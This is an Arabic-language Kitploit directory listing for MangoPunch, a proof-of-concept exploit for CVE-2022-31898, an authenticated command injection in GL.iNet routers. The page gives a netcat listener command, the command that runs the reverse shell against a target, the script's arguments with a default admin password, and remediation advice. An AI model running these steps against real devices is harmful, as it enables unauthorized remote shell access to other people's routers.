Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
MangoPunch-CVE-2022-31898 — أداة حقن الأوامر المُصادَق عليها (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
أدوات/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

أداة حقن الأوامر المُصادَق عليها (CVE-2022-31898) - HACKCONRD 2026.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🥭 MangoPunch: CVE-2022-31898

حقن أوامر نظام التشغيل بعد المصادقة لأجهزة GL.iNet

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 نظرة عامة على الثغرة

يحتوي هذا المستودع على إثبات مفهوم (PoC) تقني لثغرة تنفيذ الأوامر عن بُعد (RCE) تم اكتشافها في أجهزة GL.iNet MT300N-V2 (Mango) وغيرها من الطرازات التي تعمل بإصدارات البرنامج الثابت الأقل من 3.215.

توجد الثغرة في معامل ping_addr الخاص بواجهة برمجة تطبيقات التشخيص، مما يسمح لمهاجم مُوثَّق بتنفيذ أوامر نظام عشوائية عبر رموز الصدفة (;).


🚀 دليل التشغيل

1. تجهيز المستمع (Listener)

افتح طرفية في جهاز المهاجم (Kali Linux) وابدأ مستمع Netcat:

root@kitploit:~
nc -lvnp 9292

2. تشغيل الاستغلال

استخدم الأمر التالي لتشغيل الصدفة العكسية:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ معاملات السكربت

الخيارالاسم الكاملالوصفالافتراضي
-R--rhostعنوان IP الهدف البعيد (الموجّه)مطلوب
-P--rportمنفذ إدارة الويب443
-L--lhostعنوان IP المستمع (Kali/المهاجم)مطلوب
-l--lportمنفذ المستمعمطلوب
-p--pwdكلمة مرور المسؤولgoodlife
-t--httpsتفعيل HTTPSFalse

🛡️ المعالجة

  • تحديث البرنامج الثابت: تأكد من أن جهازك يعمل بالإصدار 3.215 أو أحدث.
  • التحقق من المدخلات: يجب على المطوّرين تنفيذ تحقق صارم باستخدام Regex لمعاملات IP/اسم المضيف وتجنّب الدوال التي تستدعي الصدفة وتمرّر سلاسل نصية خام إلى نظام التشغيل.

إخلاء مسؤولية: هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرّح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام. MangoPunch: CVE-2022-31898

تنزيل الأداة